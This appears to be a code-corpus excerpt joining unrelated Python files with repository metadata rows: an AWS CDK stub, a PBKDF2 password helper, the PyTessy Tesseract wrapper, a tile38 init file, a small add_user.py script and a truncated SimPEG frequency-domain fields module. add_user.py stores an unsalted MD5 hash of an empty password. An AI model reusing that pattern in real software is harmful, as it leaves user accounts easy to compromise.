import aws_cdk.aws_iam._jsii
import aws_cdk.core._jsii
import constructs._jsii
__jsii_assembly__ = jsii.JSIIAssembly.load(
"@aws-cdk/aws-kms", "1.56.0", __name__[0:-6], "aws-kms@1.56.0.jsii.tgz"
)
__all__ = [
"__jsii_assembly__",
]
publication.publish()
| 16.083333 | 75 | 0.756477 |
d617ac4a894c0eaf8d75e238abe61954f653e261 | 700 | py | Python | password.py | tonywh/es50w-project1 | 4a2e220741c780faaa8720fc10324f9428596f48 | [
"MIT"
] | null | null | null | password.py | tonywh/es50w-project1 | 4a2e220741c780faaa8720fc10324f9428596f48 | [
"MIT"
] | null | null | null | password.py | tonywh/es50w-project1 | 4a2e220741c780faaa8720fc10324f9428596f48 | [
"MIT"
] | null | null | null | import hashlib, binascii, os
# Returns salt + password-hash ready for storing.
def hash_password(password):
salt = hashlib.sha256(os.urandom(60)).hexdigest().encode('ascii')
hash_bin = hashlib.pbkdf2_hmac('sha512', password.encode('utf-8'), salt, 100000)
hash = binascii.hexlify(hash_bin)
return (salt + hash).decode('ascii')
# Returns True on correct match
def verify_password(stored_password, provided_password):
salt = stored_password[:64]
stored_hash = stored_password[64:]
hash_bin = hashlib.pbkdf2_hmac('sha512', provided_password.encode('utf-8'), salt.encode('ascii'), 100000)
hash = binascii.hexlify(hash_bin).decode('ascii')
return hash == stored_hash | 43.75 | 109 | 0.725714 |
927f3300269a365ce1968262405aa19b12e88151 | 17,125 | py | Python | source/pytessy.py | sydneyprovence/pytessy | f16ec8bf13f50e3b7bd1247f8785fbb64aa665c8 | [
"BSL-1.0"
] | null | null | null | source/pytessy.py | sydneyprovence/pytessy | f16ec8bf13f50e3b7bd1247f8785fbb64aa665c8 | [
"BSL-1.0"
] | null | null | null | source/pytessy.py | sydneyprovence/pytessy | f16ec8bf13f50e3b7bd1247f8785fbb64aa665c8 | [
"BSL-1.0"
] | 1 | 2021-06-08T20:25:19.000Z | 2021-06-08T20:25:19.000Z | #!/usr/bin/python3
"""
_ _
(_) | |
_ __ _ __ __ ___ | |
| '__| | | \ \/ / / _ \ | |
| | | | > < | __/ | |
|_| |_| /_/\_\ \___| |_|
PyTessy
=======
Tesseract-OCR, faster!
This module allows faster access to Tesseract-OCR from Python scripts.
This module is always faster than common Tesseract-OCR wrappers like pytesseract
because it uses direct access to Tesseract-OCR's core library instead of calling
its executable.
The specification of the connection to the driver is based on the source code
from here: https://github.com/UB-Mannheim/tesseract/blob/master/src/api/capi.cpp
Copyright rixel 2020
Distributed under the Boost Software License, Version 1.0.
See accompanying file LICENSE or a copy at https://www.boost.org/LICENSE_1_0.txt
"""
import __main__
import ctypes
import ctypes.util
from os import chdir, environ, getcwd
from os.path import abspath, dirname, isabs, isdir, isfile, join
from sys import platform
class PyTessyError(Exception):
"""
PyTessyError class
------------------
Empty subclass of Exception to throw module-specific errors.
"""
pass
class TesseractHandler(object):
"""
TesseractHandler class
----------------------
Handles raw Tesseract-OCR calls with limited functionality only.
"""
_lib = None
_api = None
class TessBaseAPI(ctypes._Pointer):
"""
TessBaseAPI
-----------
Empty ctypes._Pointer subclass to serve as TessBaseAPI handler pointer.
"""
_type_ = type('_TessBaseAPI', (ctypes.Structure,), {})
def __init__(self, lib_path=None, data_path=None, language='eng'):
"""
Initializes Tesseract-OCR api handler object instance
-----------------------------------------------------
@Params: lib_path (string) [optional] Path to Tesseract-OCR library.
data_path (string) [optional] Path to Tesseract-OCR data files.
language (string) [optional] Language code to work with.
"""
if self._lib is None:
self.setup_lib(lib_path)
self._api = self._lib.TessBaseAPICreate()
if self._lib.TessBaseAPIInit3(self._api, data_path.encode('ascii'),
language.encode('ascii')):
raise PyTessyError('Failed to initalize Tesseract-OCR library.')
def get_text(self):
"""
Gets text as utf-8 decoded string
---------------------------------
@Return: (string) Text read by Tesseract-OCR as utf-8 string.
"""
self._check_setup()
result = self._lib.TessBaseAPIGetUTF8Text(self._api)
if result:
return result.decode('utf-8')
else:
return ""
def get_text_raw(self):
"""
Gets text as raw bytes data
---------------------------
@Return: (bytes) Text read by Tesseract-OCR as raw bytes .
"""
self._check_setup()
return self._lib.TessBaseAPIGetUTF8Text(self._api)
def set_image(self, imagedata, width, height, bytes_per_pixel, bytes_per_line,
resolution):
"""
Sets image to read
------------------
@Params: imagedata (ctyps.int arrray) Raw imagedata to read.
width (int) Width of the image.
height (int) Height of the image.
bytes_per_pixel (int) Number of bytes that
represents a pixel.
bytes_per_line (int) Number of bytes in a line.
resolution (int) Resolution of the image
in dpi.
"""
self._check_setup()
self._lib.TessBaseAPISetImage(self._api,
imagedata, width, height,
bytes_per_pixel, bytes_per_line)
self._lib.TessBaseAPISetSourceResolution(self._api, resolution)
def set_variable(self, key, val):
"""
Sets a variable in Tesseract
----------
@Params: key
val : TYPE
"""
self._check_setup()
self._lib.TessBaseAPISetVariable(self._api, key, val)
@classmethod
def setup_lib(cls, lib_path=None):
"""
Binds Tesseract-OCR library to the handler
------------------------------------------
@Params: (string) [optional] Path to Tesseract-OCR library.
@Raises: PyTessyError If ctypes cannot find Tesseract-OCR library.
"""
if cls._lib is not None:
return
lib_path = ctypes.util.find_library(lib_path)
if lib_path is None:
raise PyTessyError('Ctypes couldn\'t find Tesseract-OCR library')
cls._lib = lib = ctypes.CDLL(lib_path)
lib.TessBaseAPICreate.restype = cls.TessBaseAPI # handle
lib.TessBaseAPIDelete.restype = None # void
lib.TessBaseAPIDelete.argtypes = (cls.TessBaseAPI,) # handle
lib.TessBaseAPIInit3.argtypes = (cls.TessBaseAPI, # handle
ctypes.c_char_p, # datapath
ctypes.c_char_p) # language
lib.TessBaseAPISetImage.restype = None # void
lib.TessBaseAPISetImage.argtypes = (cls.TessBaseAPI, # handle
ctypes.c_void_p, # imagedata
ctypes.c_int, # width
ctypes.c_int, # height
ctypes.c_int, # bytes_per_pixel
ctypes.c_int) # bytes_per_line
lib.TessBaseAPISetVariable.argtypes = (cls.TessBaseAPI,
ctypes.c_char_p,
ctypes.c_char_p)
lib.TessBaseAPIGetUTF8Text.restype = ctypes.c_char_p # text
lib.TessBaseAPIGetUTF8Text.argtypes = (cls.TessBaseAPI, ) # handle
lib.TessBaseAPISetSourceResolution.restype = None # void
lib.TessBaseAPISetSourceResolution.argtypes = (cls.TessBaseAPI, # handle
ctypes.c_int) # ppi
def _check_setup(self):
"""
Chekcs whether Tesseract-OCR is set up or not
---------------------------------------------
@Raises: PyTessyError If library handler not yet configured.
PyTessyError If api handler not yet configured.
"""
if not self._lib:
raise PyTessyError('Tesseract handler library not configured.')
if not self._api:
raise PyTessyError('Tesseract handler api not created.')
def __del__(self):
"""
Disconnects TessBaseAPI when instance is deleted
------------------------------------------------
"""
if not self._lib or not self._api:
return
if not getattr(self, 'closed', False):
self._lib.TessBaseAPIDelete(self._api)
self.closed = True
class PyTessy(object):
"""
PyTessy
-------
Provides user-friendly and fast Tesseract-OCR interface.
"""
DEFAULT_HORIZONTAL_DPI = 96
TESSDATA_DIRNAME = 'tessdata'
TESSERACT_DIRNAME = 'Tesseract-OCR'
TESSERACT_DEFAULT_HORIZONTAL_DPI = 70
VERSION = '0.0.1'
def __init__(self, tesseract_path=None, api_version=None, lib_path=None,
data_path=None, language='eng', verbose_search=False,
oem=1, psm=7, char_whitelist=None):
"""
Initializes PyTessy instance
----------------------------
@Params: tesseract_path (string) [optional] Path (directory's name)
to Tesseract-OCR library.
api_version (string) [optional] Api version suffix string
(should be compatible with
Tesseract-OCR 3).
lib_path (string) [optional] Exact path to the
Tesseract-OCR library.
to data directory (usually "tessdata").
data_path (string) [optional] Path (directory's name)
to data directory (usually "tessdata").
language (string) [optional] Languge code to use.
verbose_search (boolean) [optional] Whether to display
library searching process or not.
@Raises: NotImplementedError If the operating system is not
implemented yet (linux, macOS).
You can avoid this error by giving
exact path of Tesseract-OCR library.
NotImplementedError If the operating system will be
never implemented.
You can avoid this error by giving
exact path of Tesseract-OCR library.
FileNotFoundError If the given exact library path
doesn't point to existing file.
FileNotFoundError If failed to found library with
search process.
FileNotFoundError If cannot found "tessdata" directory.
"""
run_path = dirname(abspath(__main__.__file__))
no_lib = True
if lib_path is not None:
if isfile(lib_path):
no_lib = False
else:
raise FileNotFoundError('PyTessy: lib_path: "{}" doesn\'t exist.'
.format(lib_path))
if no_lib:
if verbose_search:
verbose = lambda *pa, **pk: print(*pa, **pk)
else:
verbose = lambda *pa, **pk: None
if platform.startswith('win'):
verbose('PyTessy v{} on {} searching for Tesseract-OCR library...'
.format(PyTessy.VERSION, platform))
if api_version is None:
lib_name = 'libtesseract-5'
else:
lib_name = 'libtesseract{}'.format(api_version)
verbose('--- Target library name: {}'.format(lib_name))
if tesseract_path is not None:
dirs = [tesseract_path, run_path, join(run_path, PyTessy.TESSERACT_DIRNAME)]
else:
dirs = [run_path, join(run_path, PyTessy.TESSERACT_DIRNAME)]
if 'PROGRAMFILES' in environ:
dirs.append(join(environ['PROGRAMFILES'], PyTessy.TESSERACT_DIRNAME))
if 'PROGRAMFILES(X86)' in environ:
dirs.append(join(environ['PROGRAMFILES(X86)'], PyTessy.TESSERACT_DIRNAME))
for dir in dirs:
test = join(dir, '{}.dll'.format(lib_name))
if isfile(test):
lib_path = test
verbose(' {} SUCCESS.'.format(test))
break
else:
verbose(' {} FAILED.'.format(test))
if lib_path is None:
raise FileNotFoundError('Cannot locate Tesseract-OCR library.')
elif platform.startswith('linux'):
raise NotImplementedError('PyTessy: Library search on Linux is not implemented yet.')
elif platform.startswith('darwin'):
raise NotImplementedError('PyTessy: Library search on MacOS is not implemented yet.')
else:
raise NotImplementedError('PyTessy: Library search on this system is not implemented.')
tess_path = dirname(abspath(lib_path))
no_tessdata = True
if data_path is not None:
if isdir(data_path):
no_tessdata = False
if no_tessdata:
for test_path in [run_path, join(run_path, PyTessy.TESSERACT_DIRNAME), tess_path]:
test_path = join(test_path, PyTessy.TESSDATA_DIRNAME)
if isdir(test_path):
data_path = test_path
break
if data_path is None:
raise FileNotFoundError('PyTessy: Couldn\'t find "tessdata" directory.')
self._tess = TesseractHandler(lib_path=lib_path, data_path=data_path,
language=language)
self._tess.set_variable(b"tessedit_pageseg_mode", bytes(psm))
self._tess.set_variable(b"tessedit_ocr_engine_mode", bytes(oem))
if char_whitelist:
self._tess.set_variable(b"tessedit_char_whitelist", char_whitelist)
def justread(self, raw_image_ctypes, width, height, bytes_per_pixel,
bytes_per_line, resolution=96):
"""
Reads text as utf-8 string from raw image data without any check
----------------------------------------------------------------
@Params: raw_image_ctypes (ctypes int arrray) Raw image data.
width (int) Image width.
height (int) Image height.
bytes_per_pixel (int) Number of bytes per pixel.
bytes_per_line (int) Number of bytes per line.
resolution (int) [optional] Resolution in
dpi. Default: 96.
@Return: (sting) Text read by Tesseract-OCR
as utf-8 string.
"""
self._tess.set_image(raw_image_ctypes, width, height, bytes_per_pixel,
bytes_per_line, resolution)
return self._tess.get_text()
def justread_raw(self, raw_image_ctypes, width, height, bytes_per_pixel,
bytes_per_line, resolution=96):
"""
Reads text as raw bytes data from raw image data without any check
------------------------------------------------------------------
@Params: raw_image_ctypes (ctypes int arrray) Raw image data.
width (int) Image width.
height (int) Image height.
bytes_per_pixel (int) Number of bytes per pixel.
bytes_per_line (int) Number of bytes per line.
resolution (int) [optional] Resolution in
dpi. Default: 96.
@Return: (bytes) Text read by Tesseract-OCR
as raw bytes data.
"""
self._tess.set_image(raw_image_ctypes, width, height, bytes_per_pixel,
bytes_per_line, resolution)
return self._tess.get_text()
def read(self, imagedata, width, height, bytes_per_pixel, resolution=96,
raw=False):
"""
Reads text from image data
--------------------------
@Params: imagedata (ctypes int arrray) Raw image data.
width (int) Image width.
height (int) Image height.
bytes_per_pixel (int) Number of bytes per pixel.
resolution (int) [optional] Resolution in
dpi. Default: 96.
raw (boolean) [optional] Whether to read
in raw or utf-8 mode.
@Return: (bytes) or (string) Text read by Tesseract-OCR
"""
bytes_per_line = width * bytes_per_pixel
if raw:
return self.justread_raw(imagedata, width, height, bytes_per_pixel,
bytes_per_line, resolution)
else:
return self.justread(imagedata, width, height, bytes_per_pixel,
bytes_per_line, resolution)
if __name__ == '__main__':
print('This is a module not a script.')
| 40.871122 | 103 | 0.494307 |
80e63538ce1e26fe44561622d70e2d7d02bb1455 | 206 | py | Python | tile38/__init__.py | beyoung/tile38_py | 1f5a064a3968d47bc30d59aa8c59b7d9270e11ed | [
"MIT"
] | null | null | null | tile38/__init__.py | beyoung/tile38_py | 1f5a064a3968d47bc30d59aa8c59b7d9270e11ed | [
"MIT"
] | null | null | null | tile38/__init__.py | beyoung/tile38_py | 1f5a064a3968d47bc30d59aa8c59b7d9270e11ed | [
"MIT"
] | null | null | null | # !/user/bin/env/python
# -*- coding: utf-8 -*-
# version: v0.0.1
# author: youth
# contact: tuwenyoung@gmail.com
# project: tile38_py
# filename: __init__.py.py
# datetime: 2017-01-13 22:20
# description: | 22.888889 | 31 | 0.679612 |
719944bfa7bc74c200af87841562ae58ab7e9ee3 | 330 | py | Python | bin/add_user.py | ryanrdetzel/Mental-Cache | d29219d543ca2a0003dd2e0410d16d2f3f9f19c5 | [
"MIT"
] | 1 | 2020-04-14T13:28:38.000Z | 2020-04-14T13:28:38.000Z | bin/add_user.py | ryanrdetzel/Mental-Cache | d29219d543ca2a0003dd2e0410d16d2f3f9f19c5 | [
"MIT"
] | null | null | null | bin/add_user.py | ryanrdetzel/Mental-Cache | d29219d543ca2a0003dd2e0410d16d2f3f9f19c5 | [
"MIT"
] | null | null | null | #!/usr/bin/python
import pytc
import hashlib
import pickle
DBNAME="../mental_cache.hdb"
db = pytc.HDB()
db.open(DBNAME, pytc.HDBOWRITER | pytc.HDBOCREAT)
profile = {
'pw':hashlib.md5("").hexdigest(),
'id':'ff5634',
'name': 'Ryan Detzel'
}
db.put('ryan',pickle.dumps(profile))
#print pickle.loads(db.get('ryan'))
| 16.5 | 49 | 0.660606 |
8167d1f530ebf0ada04fcd6b33c9ad193d3a541c | 56,228 | py | Python | SimPEG/electromagnetics/frequency_domain/fields.py | Prithwijit-Chak/simpeg | d93145d768b5512621cdd75566b4a8175fee9ed3 | [
"MIT"
] | 358 | 2015-03-11T05:48:41.000Z | 2022-03-26T02:04:12.000Z | SimPEG/electromagnetics/frequency_domain/fields.py | Prithwijit-Chak/simpeg | d93145d768b5512621cdd75566b4a8175fee9ed3 | [
"MIT"
] | 885 | 2015-01-19T09:23:48.000Z | 2022-03-29T12:08:34.000Z | SimPEG/electromagnetics/frequency_domain/fields.py | Prithwijit-Chak/simpeg | d93145d768b5512621cdd75566b4a8175fee9ed3 | [
"MIT"
] | 214 | 2015-03-11T05:48:43.000Z | 2022-03-02T01:05:11.000Z | import numpy as np
import scipy.sparse as sp
from ...fields import Fields
from ...utils import mkvc, Zero, Identity, sdiag
from ..utils import omega
from ...utils.code_utils import deprecate_class
class FieldsFDEM(Fields):
"""
Fancy Field Storage for a FDEM survey. Only one field type is stored for
each problem, the rest are computed. The fields object acts like an array
and is indexed by
.. code-block:: python
f = problem.fields(m)
e = f[source_list,'e']
b = f[source_list,'b']
If accessing all sources for a given field, use the :code:`:`
.. code-block:: python
f = problem.fields(m)
e = f[:,'e']
b = f[:,'b']
The array returned will be size (nE or nF, nSrcs :math:`\\times`
nFrequencies)
"""
knownFields = {}
dtype = complex
def _GLoc(self, fieldType):
"""Grid location of the fieldType"""
return self.aliasFields[fieldType][1]
def _e(self, solution, source_list):
"""
Total electric field is sum of primary and secondary
:param numpy.ndarray solution: field we solved for
:param list source_list: list of sources
:rtype: numpy.ndarray
:return: total electric field
"""
if (
getattr(self, "_ePrimary", None) is None
or getattr(self, "_eSecondary", None) is None
):
raise NotImplementedError(
"Getting e from {0!s} is not implemented".format(
self.knownFields.keys()[0]
)
)
return self._ePrimary(solution, source_list) + self._eSecondary(
solution, source_list
)
def _b(self, solution, source_list):
"""
Total magnetic flux density is sum of primary and secondary
:param numpy.ndarray solution: field we solved for
:param list source_list: list of sources
:rtype: numpy.ndarray
:return: total magnetic flux density
"""
if (
getattr(self, "_bPrimary", None) is None
or getattr(self, "_bSecondary", None) is None
):
raise NotImplementedError(
"Getting b from {0!s} is not implemented".format(
self.knownFields.keys()[0]
)
)
return self._bPrimary(solution, source_list) + self._bSecondary(
solution, source_list
)
def _bSecondary(self, solution, source_list):
"""
Total magnetic flux density is sum of primary and secondary
:param numpy.ndarray solution: field we solved for
:param list source_list: list of sources
:rtype: numpy.ndarray
:return: total magnetic flux density
"""
if getattr(self, "_bSecondary", None) is None:
raise NotImplementedError(
"Getting b from {} is not implemented".format(
self.knownFields.keys()[0]
)
)
return self._bSecondary(solution, source_list)
def _h(self, solution, source_list):
"""
Total magnetic field is sum of primary and secondary
:param numpy.ndarray solution: field we solved for
:param list source_list: list of sources
:rtype: numpy.ndarray
:return: total magnetic field
"""
if (
getattr(self, "_hPrimary", None) is None
or getattr(self, "_hSecondary", None) is None
):
raise NotImplementedError(
"Getting h from {0!s} is not implemented".format(
self.knownFields.keys()[0]
)
)
return self._hPrimary(solution, source_list) + self._hSecondary(
solution, source_list
)
def _j(self, solution, source_list):
"""
Total current density is sum of primary and secondary
:param numpy.ndarray solution: field we solved for
:param list source_list: list of sources
:rtype: numpy.ndarray
:return: total current density
"""
if (
getattr(self, "_jPrimary", None) is None
or getattr(self, "_jSecondary", None) is None
):
raise NotImplementedError(
"Getting j from {0!s} is not implemented".format(
self.knownFields.keys()[0]
)
)
return self._jPrimary(solution, source_list) + self._jSecondary(
solution, source_list
)
def _eDeriv(self, src, du_dm_v, v, adjoint=False):
"""
Total derivative of e with respect to the inversion model. Returns
:math:`d\mathbf{e}/d\mathbf{m}` for forward and
(:math:`d\mathbf{e}/d\mathbf{u}`, :math:`d\mathb{u}/d\mathbf{m}`)
for the adjoint
:param SimPEG.electromagnetics.frequency_domain.Src.BaseFDEMSrc src: source
:param numpy.ndarray du_dm_v: derivative of the solution vector with
respect to the model times a vector (is None for adjoint)
:param numpy.ndarray v: vector to take sensitivity product with
:param bool adjoint: adjoint?
:rtype: numpy.ndarray
:return: derivative times a vector (or tuple for adjoint)
"""
if (
getattr(self, "_eDeriv_u", None) is None
or getattr(self, "_eDeriv_m", None) is None
):
raise NotImplementedError(
"Getting eDerivs from {0!s} is not implemented".format(
self.knownFields.keys()[0]
)
)
if adjoint:
return (self._eDeriv_u(src, v, adjoint), self._eDeriv_m(src, v, adjoint))
return np.array(
self._eDeriv_u(src, du_dm_v, adjoint) + self._eDeriv_m(src, v, adjoint),
dtype=complex,
)
def _bDeriv(self, src, du_dm_v, v, adjoint=False):
"""
Total derivative of b with respect to the inversion model. Returns
:math:`d\mathbf{b}/d\mathbf{m}` for forward and
(:math:`d\mathbf{b}/d\mathbf{u}`, :math:`d\mathb{u}/d\mathbf{m}`) for
the adjoint
:param SimPEG.electromagnetics.frequency_domain.Src.BaseFDEMSrc src: source
:param numpy.ndarray du_dm_v: derivative of the solution vector with
respect to the model times a vector (is None for adjoint)
:param numpy.ndarray v: vector to take sensitivity product with
:param bool adjoint: adjoint?
:rtype: numpy.ndarray
:return: derivative times a vector (or tuple for adjoint)
"""
if (
getattr(self, "_bDeriv_u", None) is None
or getattr(self, "_bDeriv_m", None) is None
):
raise NotImplementedError(
"Getting bDerivs from {0!s} is not implemented".format(
self.knownFields.keys()[0]
)
)
if adjoint:
return (self._bDeriv_u(src, v, adjoint), self._bDeriv_m(src, v, adjoint))
return np.array(
self._bDeriv_u(src, du_dm_v, adjoint) + self._bDeriv_m(src, v, adjoint),
dtype=complex,
)
def _bSecondaryDeriv(self, src, du_dm_v, v, adjoint=False):
"""
Total derivative of b with respect to the inversion model. Returns
:math:`d\mathbf{b}/d\mathbf{m}` for forward and
(:math:`d\mathbf{b}/d\mathbf{u}`, :math:`d\mathb{u}/d\mathbf{m}`) for
the adjoint
:param SimPEG.electromagnetics.frequency_domain.sources.BaseFDEMSrc src: sorce
:param numpy.ndarray du_dm_v: derivative of the solution vector with
respect to the model times a vector (is None for adjoint)
:param numpy.ndarray v: vector to take sensitivity product with
:param bool adjoint: adjoint?
:rtype: numpy.ndarray
:return: derivative times a vector (or tuple for adjoint)
"""
# TODO: modify when primary field is dependent on m
return self._bDeriv(src, du_dm_v, v, adjoint=adjoint)
def _hDeriv(self, src, du_dm_v, v, adjoint=False):
"""
Total derivative of h with respect to the inversion model. Returns
:math:`d\mathbf{h}/d\mathbf{m}` for forward and
(:math:`d\mathbf{h}/d\mathbf{u}`, :math:`d\mathb{u}/d\mathbf{m}`)
for the adjoint
:param SimPEG.electromagnetics.frequency_domain.Src.BaseFDEMSrc src: source
:param numpy.ndarray du_dm_v: derivative of the solution vector with
respect to the model times a vector (is None for adjoint)
:param numpy.ndarray v: vector to take sensitivity product with
:param bool adjoint: adjoint?
:rtype: numpy.ndarray
:return: derivative times a vector (or tuple for adjoint)
"""
if (
getattr(self, "_hDeriv_u", None) is None
or getattr(self, "_hDeriv_m", None) is None
):
raise NotImplementedError(
"Getting hDerivs from {0!s} is not implemented".format(
self.knownFields.keys()[0]
)
)
if adjoint:
return (self._hDeriv_u(src, v, adjoint), self._hDeriv_m(src, v, adjoint))
return np.array(
self._hDeriv_u(src, du_dm_v, adjoint) + self._hDeriv_m(src, v, adjoint),
dtype=complex,
)
def _jDeriv(self, src, du_dm_v, v, adjoint=False):
"""
Total derivative of j with respect to the inversion model. Returns
:math:`d\mathbf{j}/d\mathbf{m}` for forward and
(:math:`d\mathbf{j}/d\mathbf{u}`, :math:`d\mathb{u}/d\mathbf{m}`) for
the adjoint
:param SimPEG.electromagnetics.frequency_domain.Src.BaseFDEMSrc src: source
:param numpy.ndarray du_dm_v: derivative of the solution vector with
respect to the model times a vector (is None for adjoint)
:param numpy.ndarray v: vector to take sensitivity product with
:param bool adjoint: adjoint?
:rtype: numpy.ndarray
:return: derivative times a vector (or tuple for adjoint)
"""
if (
getattr(self, "_jDeriv_u", None) is None
or getattr(self, "_jDeriv_m", None) is None
):
raise NotImplementedError(
"Getting jDerivs from {0!s} is not implemented".format(
self.knownFields.keys()[0]
)
)
if adjoint:
return (self._jDeriv_u(src, v, adjoint), self._jDeriv_m(src, v, adjoint))
return np.array(
self._jDeriv_u(src, du_dm_v, adjoint) + self._jDeriv_m(src, v, adjoint),
dtype=complex,
)
class Fields3DElectricField(FieldsFDEM):
"""
Fields object for Simulation3DElectricField.
:param discretize.base.BaseMesh mesh: mesh
:param SimPEG.electromagnetics.frequency_domain.SurveyFDEM.Survey survey: survey
"""
knownFields = {"eSolution": "E"}
aliasFields = {
"e": ["eSolution", "E", "_e"],
"ePrimary": ["eSolution", "E", "_ePrimary"],
"eSecondary": ["eSolution", "E", "_eSecondary"],
"b": ["eSolution", "F", "_b"],
"bPrimary": ["eSolution", "F", "_bPrimary"],
"bSecondary": ["eSolution", "F", "_bSecondary"],
"j": ["eSolution", "E", "_j"],
"h": ["eSolution", "F", "_h"],
}
def startup(self):
self._edgeCurl = self.simulation.mesh.edgeCurl
self._aveE2CCV = self.simulation.mesh.aveE2CCV
self._aveF2CCV = self.simulation.mesh.aveF2CCV
self._nC = self.simulation.mesh.nC
self._MeSigma = self.simulation.MeSigma
self._MeSigmaDeriv = self.simulation.MeSigmaDeriv
self._MfMui = self.simulation.MfMui
self._MfMuiDeriv = self.simulation.MfMuiDeriv
self._MeI = self.simulation.MeI
self._MfI = self.simulation.MfI
def _GLoc(self, fieldType):
if fieldType in ["e", "eSecondary", "ePrimary", "j"]:
return "E"
elif fieldType in ["b", "bSecondary", "bPrimary", "h"]:
return "F"
else:
raise Exception("Field type must be e, b, h, j")
def _ePrimary(self, eSolution, source_list):
"""
Primary electric field from source
:param numpy.ndarray eSolution: field we solved for
:param list source_list: list of sources
:rtype: numpy.ndarray
:return: primary electric field as defined by the sources
"""
ePrimary = np.zeros([self.simulation.mesh.nE, len(source_list)], dtype=complex)
for i, src in enumerate(source_list):
ep = src.ePrimary(self.simulation)
ePrimary[:, i] = ePrimary[:, i] + ep
return ePrimary
def _eSecondary(self, eSolution, source_list):
"""
Secondary electric field is the thing we solved for
:param numpy.ndarray eSolution: field we solved for
:param list source_list: list of sources
:rtype: numpy.ndarray
:return: secondary electric field
"""
return eSolution
def _eDeriv_u(self, src, v, adjoint=False):
"""
Partial derivative of the total electric field with respect to the
thing we solved for.
:param SimPEG.electromagnetics.frequency_domain.sources.BaseFDEMSrc src: source
:param numpy.ndarray v: vector to take product with
:param bool adjoint: adjoint?
:rtype: numpy.ndarray
:return: product of the derivative of the electric field with respect
to the field we solved for with a vector
"""
return Identity() * v
def _eDeriv_m(self, src, v, adjoint=False):
"""
Partial derivative of the total electric field with respect to the
inversion model. Here, we assume that the primary does not depend on
the model. Note that this also includes derivative contributions from
the sources.
:param SimPEG.electromagnetics.frequency_domain.sources.BaseFDEMSrc src: source
:param numpy.ndarray v: vector to take product with
:param bool adjoint: adjoint?
:rtype: SimPEG.utils.Zero
:return: product of the electric field derivative with respect to the
inversion model with a vector
"""
return src.ePrimaryDeriv(self.simulation, v, adjoint)
def _bPrimary(self, eSolution, source_list):
"""
Primary magnetic flux density from source
:param numpy.ndarray eSolution: field we solved for
:param list source_list: list of sources
:rtype: numpy.ndarray
:return: primary magnetic flux density as defined by the sources
"""
bPrimary = np.zeros(
[self._edgeCurl.shape[0], eSolution.shape[1]], dtype=complex
)
for i, src in enumerate(source_list):
bp = src.bPrimary(self.simulation)
bPrimary[:, i] = bPrimary[:, i] + bp
return bPrimary
def _bSecondary(self, eSolution, source_list):
"""
Secondary magnetic flux density from eSolution
:param numpy.ndarray eSolution: field we solved for
:param list source_list: list of sources
:rtype: numpy.ndarray
:return: secondary magnetic flux density
"""
C = self._edgeCurl
b = C * eSolution
for i, src in enumerate(source_list):
b[:, i] *= -1.0 / (1j * omega(src.frequency)) # freq depends on the source
s_m = src.s_m(self.simulation)
b[:, i] = b[:, i] + 1.0 / (1j * omega(src.frequency)) * s_m
return b
def _bDeriv_u(self, src, du_dm_v, adjoint=False):
"""
Derivative of the magnetic flux density with respect to the thing we
solved for
:param SimPEG.electromagnetics.frequency_domain.sources.BaseFDEMSrc src: source
:param numpy.ndarray du_dm_v: vector to take product with
:param bool adjoint: adjoint?
:rtype: numpy.ndarray
:return: product of the derivative of the magnetic flux density with
respect to the field we solved for with a vector
"""
C = self._edgeCurl
if adjoint:
return -1.0 / (1j * omega(src.frequency)) * (C.T * du_dm_v)
return -1.0 / (1j * omega(src.frequency)) * (C * du_dm_v)
def _bDeriv_m(self, src, v, adjoint=False):
"""
Derivative of the magnetic flux density with respect to the inversion
model.
:param SimPEG.electromagnetics.frequency_domain.sources.BaseFDEMSrc src: source
:param numpy.ndarray v: vector to take product with
:param bool adjoint: adjoint?
:rtype: numpy.ndarray
:return: product of the magnetic flux density derivative with respect
to the inversion model with a vector
"""
return self._bDeriv_src(src, v, adjoint=adjoint)
def _bDeriv_src(self, src, v, adjoint=False):
s_mDeriv = src.s_mDeriv(self.simulation, v, adjoint)
return 1.0 / (1j * omega(src.frequency)) * s_mDeriv + src.bPrimaryDeriv(
self.simulation, v, adjoint
)
def _j(self, eSolution, source_list):
"""
Current density from eSolution
:param numpy.ndarray eSolution: field we solved for
:param list source_list: list of sources
:rtype: numpy.ndarray
:return: current density
"""
return self._MeI * (self._MeSigma * self._e(eSolution, source_list))
def _jDeriv_u(self, src, du_dm_v, adjoint=False):
"""
Derivative of the current density with respect to the thing we solved
for
:param SimPEG.electromagnetics.frequency_domain.sources.BaseFDEMSrc src: source
:param numpy.ndarray du_dm_v: vector to take product with
:param bool adjoint: adjoint?
:rtype: numpy.ndarray
:return: product of the derivative of the current density with respect
to the field we solved for with a vector
"""
if adjoint:
return self._eDeriv_u(
src, self._MeSigma.T * (self._MeI.T * du_dm_v), adjoint=adjoint
)
return self._MeI * (
self._MeSigma * (self._eDeriv_u(src, du_dm_v, adjoint=adjoint))
)
def _jDeriv_m(self, src, v, adjoint=False):
"""
Derivative of the current density with respect to the inversion model.
:param SimPEG.electromagnetics.frequency_domain.sources.BaseFDEMSrc src: source
:param numpy.ndarray v: vector to take product with
:param bool adjoint: adjoint?
:rtype: numpy.ndarray
:return: product of the current density derivative with respect to the
inversion model with a vector
"""
e = self[src, "e"]
if adjoint:
return (
self._MeSigmaDeriv(e, (self._MeI.T * v), adjoint=adjoint)
+ self._eDeriv_m(src, (self._MeI.T * v), adjoint=adjoint)
) + src.jPrimaryDeriv(self.simulation, v, adjoint)
return (
self._MeI
* (
self._eDeriv_m(src, v, adjoint=adjoint)
+ self._MeSigmaDeriv(e, v, adjoint=adjoint)
)
) + src.jPrimaryDeriv(self.simulation, v, adjoint)
def _h(self, eSolution, source_list):
"""
Magnetic field from eSolution
:param numpy.ndarray eSolution: field we solved for
:param list source_list: list of sources
:rtype: numpy.ndarray
:return: magnetic field
"""
return self._MfI * (self._MfMui * self._b(eSolution, source_list))
def _hDeriv_u(self, src, du_dm_v, adjoint=False):
"""
Derivative of the magnetic field with respect to the thing we solved
for
:param SimPEG.electromagnetics.frequency_domain.sources.BaseFDEMSrc src: source
:param numpy.ndarray du_dm_v: vector to take product with
:param bool adjoint: adjoint?
:rtype: numpy.ndarray
:return: product of the derivative of the magnetic field with respect
to the field we solved for with a vector
"""
if adjoint:
v = self._MfMui.T * (self._MfI.T * du_dm_v)
return self._bDeriv_u(src, v, adjoint=adjoint)
return self._MfI * (self._MfMui * self._bDeriv_u(src, du_dm_v, adjoint=adjoint))
def _hDeriv_mui(self, src, v, adjoint=False):
# n = int(self._aveF2CCV.shape[0] / self._nC) # Number of Components
# VI = sdiag(np.kron(np.ones(n), 1./self.simulation.mesh.vol))
if adjoint is True:
